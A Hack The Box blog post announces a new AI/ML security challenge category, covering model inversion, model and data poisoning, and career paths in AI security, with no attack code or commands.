Red Teaming
JXoaT,
Jul 18
2024
As part of Hack The Box's (HTB) mission to provide our community with relevant content and stay on top of up-and-coming threats, we are thrilled to announce a new Challenge category focused on AI and ML!
You see it in your daily life, whether it’s spicing up an essay with GrammarlyGo or setting up a site with Wix AI website builder. There is an inevitable gravity pulling everyone into contact with these technologies.
The first thing I think is: “How does this tech work, and what are the current ways to exploit it?”
You will find new Challenges on the HTB Labs Platform that give you a place to practice your knowledge of AI exploits, carving out a place for you to grow your curiosity. What will these Challenges teach you? And how will upskilling in this security specialty help impact your career or business?
Let’s dig into that now.
Challenges have collectively helped us explore and communicate areas of technology in a more direct fashion. AI/ML is a fresh category and there are scarcely places for you to practice the intricacies of individual attacks.
That is something we wish to showcase within this new category. We have used space-themed Challenges to explore the diversity of methods that security pillars like OWASP and MITRE have shed light on.
OWASP has a Top 10 for both LLM Applications and Machine Learning Security. Each provides essential guidance on understanding top security risks associated with both respective innovations.
MITRE is a household name in security for their matrices that define adversarial techniques throughout the lifecycle of an attack. In 2021, MITRE released ATLAS, a matrix that analyzes threats and vulnerabilities specific to AI systems.
Hack The Box has steadily been mapping and creating content that aligns with methods seen throughout all of the referenced guides above.
We suggest utilizing all of them while taking a shot at the Challenges below!
For these particular Challenges we focus on:
Manipulate widely utilized open-source frameworks PyTorch and TensorFlow to perform attacks.
Understand model inversion, which allows attackers to exploit learned ML patterns created within training data. Then, they utilize gradient methods to reconstruct and make sense of the information they find.
Attempt model poisoning to trick an ML mode itself by introducing malicious updates or modifications, which can lead to miscategorizing information it hands back to the user.
Utilize Data Poisoning to inject false or misleading data points into the dataset to cause the model to learn incorrect patterns, leading to degraded performance or specific incorrect outputs.
Our goal is to encourage users to discover ways to deploy their understanding of various techniques to bypass, manipulate, and reconfigure model data. Also, enjoy time well spent navigating your curiosity through each Challenge. Log on to the HTB Labs Platform and solve them all, today!
As attacks against models and companies looking to incorporate them into their products begin to grow, so will a need for professionals who can challenge and harden the security of these applications.
Why is that a good thing? As we've said countless times before, if something is new, it likely isn't that secure. That works to your advantage.
And that’s why upskilling in AI security opens new doors for your career development. You'll not only become a highly sought-after source of unique knowledge by acquiring these skills, but you'll also be part of a rapidly expanding specialty across various industries.
It's important to remember that this is a specialty field. Previous experience in offensive and defensive security is required. The roles that exist tend to lean towards more senior positions, but they aren't limited to them.
Additionally, a strong background in languages like Python and R and an additional understanding of common frameworks are boon.
Here are a few roles and requirements to give you a good idea of what’s out there:
If you want to dive straight into testing the stability of AI/ML applications, you can also find bug bounty platforms looking to grow into this space. This way, you can test the skills you employed through these Challenges on real-world targets.
The explicit need for bug bounty hunters focused in this area of expertise has led to the rise of platforms like huntr that merge web exploitation and knowledge of AI models.
We asked huntr how why they think learning practical AI/ML vulnerability exploitation and our Challenges are relevant:
"HTB's challenges are a great way to dive into AI/ML security. They focus on adversarial attacks, which are crucial for understanding model robustness. At huntr, we deal with practical AI vulnerabilities, so the skills you gain from HTB will help you tackle real-world issues effectively." - Marcello Salvati, Threat Researcher at Protect AI
We want to offer you a way to become familiar with new techniques, but a curiosity today can lead to a career tomorrow! It is important to stay up-to-date on what's out there now.
Any use of AI comes with potential risks, especially as providers are still working out the kinks.
Despite having policies, over 40% of employees use generative AI, yet only 6% of organizations offer comprehensive AI training to all staff.
As companies and their employees embrace AI—both directly and indirectly via AI-enabled products—they will need processes and capabilities to mitigate risks and gauge potential implications for security and regulatory compliance.
60% of organizations take longer than four days to resolve security issues. Unpreparedness in the face of AI attacks increases not only the time to remediate an attack but also its relative cost to the organization.
AI/ML Challenges within Dedicated Labs enhance teams' familiarity with these technologies and security techniques, improving their understanding of AI/ML attacks and enabling them to effectively secure AI and ML within organizations.
Consistent practice and training on AI can be key to reducing detection and escalation costs in data breaches, which average $1.58 million, and preventing disruption to revenue operations, which can average $1.3 million in losses.
All existing business customers can access the new Challenge category on Dedicated Labs within the HTB Enterprise Platform.
To get started, assign AI/ML Challenges to your team’s practice Space. Check out the below step-by-step video on how to assign Challenges to your team.